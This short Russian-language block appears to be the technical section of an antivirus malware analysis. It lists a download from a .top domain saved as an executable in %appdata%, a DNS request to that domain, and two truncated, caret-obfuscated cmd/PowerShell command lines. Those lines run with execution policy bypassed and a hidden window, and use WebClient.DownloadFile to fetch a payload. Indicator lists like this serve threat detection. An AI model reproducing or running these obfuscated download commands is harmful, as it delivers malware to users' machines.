Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^rs^He^L^L.^eXE^ -exEc^ut^i^o^np^oLi^cY ^BypaSS -NoPro^FiLe^ -windoWs^TY^l^E ^hi^DdeN ^(N^e^W^-O^bj^eCT sy^S^tEm^.ne^t^.^W^E^B^clIEnt).doWN^LoaD^F^IlE^('http://sutraponef...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOwE^rs^He^L^L.^eXE^ -exEc^ut^i^o^np^oLi^cY ^BypaSS -NoPro^FiLe^ -windoWs^TY^l^E ^hi^DdeN ^(N^e^W^-O^bj^eCT sy^S^tEm^.ne^t^.^W^E^B^clIEnt).doWN^LoaD^F^IlE^('http://sutraponef...' (со скрытым окном)